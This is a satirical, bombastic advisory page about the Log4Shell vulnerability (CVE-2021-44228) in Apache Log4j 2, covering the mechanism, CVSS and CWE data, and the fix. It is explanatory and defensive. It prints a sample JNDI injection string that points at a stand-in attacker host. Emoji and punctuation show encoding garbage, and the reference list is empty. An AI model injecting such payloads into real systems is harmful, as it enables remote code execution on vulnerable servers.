π WHAT WEβRE LAUNCHING
Folks, let me tell you, this is the GREATEST logging vulnerability ever conceived. Apache Log4j 2 β the most popular Java logging library, used EVERYWHERE β looks up special strings in the messages it logs. Nobody asked it to. It just does it. Tremendous.
When an attacker gets a string like ${jndi:ldap://evil.example/x} into ANY logged field β
a username, a User-Agent header, a chat message β Log4j helpfully reaches out over JNDI,
fetches a remote class, and runs it. Remote code execution from a LOG LINE. Beautiful.
π₯ HOW IT WORKS (100% REAL, BELIEVE ME)
Log4j 2βs message lookup substitution expands ${...} expressions at log time. The jndi
lookup resolves names via the Java Naming and Directory Interface, including remote ldap://
and rmi:// URLs. The referenced object is deserialized and instantiated β thatβs the
CWE-502 (Unsafe Deserialization) and CWE-917 (Expression Language Injection) one-two
punch. No authentication. No user interaction. Network-reachable. The CVSS is a perfect 10.0,
which we consider an INSULT to how big this really is.
π‘οΈ THE FIX NOBODY WANTS TO TALK ABOUT
Upgrade to Log4j 2.17.1 or later. Remove the JndiLookup class if you canβt.
Itβs low-energy. Itβs boring. Do it anyway.
π THE BORING (BUT 100% REAL) FACTS
| CVE | CVE-2021-44228 |
|---|---|
| CVSS | 10.0 (CRITICAL) β a very low-energy score. We rate it 11/10 β A PERFECT SCORE, MANY ARE SAYING HIGHER. |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| Weakness | CWE-502, CWE-917 |
| Published | 2021-12-10 |
References (all TREMENDOUS sources):
β FREQUENTLY ASKED QUESTIONS (THE BEST QUESTIONS)
Q: Is this real?
A: Catastrophically, yes. It is the realest thing in the history of logging.
Q: Do I need to patch?
A: You needed to patch yesterday. Many people are saying you needed to patch in 2013.
π OFFICIAL MERCHANDISE
| Item | Price | Availability |
|---|---|---|
| ${jndi:ldap://} Tee | $44.22 | SOLD OUT |
| Patch Tuesday Panic Mug | $12.10 | SOLD OUT |